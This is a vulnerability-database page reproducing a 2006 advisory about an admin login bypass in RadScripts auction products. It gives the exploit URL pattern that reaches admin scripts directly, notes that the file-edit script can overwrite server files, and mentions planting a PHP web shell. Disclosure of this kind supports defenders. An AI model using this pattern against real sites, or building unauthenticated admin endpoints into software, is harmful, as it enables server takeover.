Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

radscripts.txt

🗓️ 26 Jul 2006 00:00:00Reported by INVENTType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

RadScripts offers RadBids Gold, RadLance Gold, RadNics Gold auction products with a vulnerability in admin login bypass. The exploit allows overwriting files on the server, including uploading own php web-shell

Code
`Products: RadBids Gold, RadLance Gold, RadNics Gold auction products  
  
Vendor: RadScripts  
  
URL: http://www.radscripts.com/  
  
VULNERABILITY CLASS: Admin login bypass  
  
[Product Description]  
  
RadBids was designed to give you all the tools needed to rapidly deploy an ebay style auction web site solution. Our php   
  
auction software is simple to deploy and easy to manage. From a web-based aministrative panel one can manage all aspects of   
  
the auction software including categories, users, financial transactions and every aspect of the auction software with a few   
  
clicks of the mouse.   
  
[Summary]  
  
An attacker can exploit RadScripts Auction Software admin login by entering the direct URL to admin scripts.  
  
[Exploit]  
  
http://target.xxx/[product_home]/admin/a_[admin_action_file]  
  
For example:  
http://target.xxx/[product_home]/admin/a_editpage.php?filename=[arbitrary_file]  
  
This can be used overwrite any file on server which has write permissions on it.   
For example upload own php web-shell.  
  
[Credits]  
  
INVENT`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
radscriptsradbids goldradlance goldradnics goldauction productsvulnerabilityadmin loginbypassexploitoverwriteserverweb-shell
28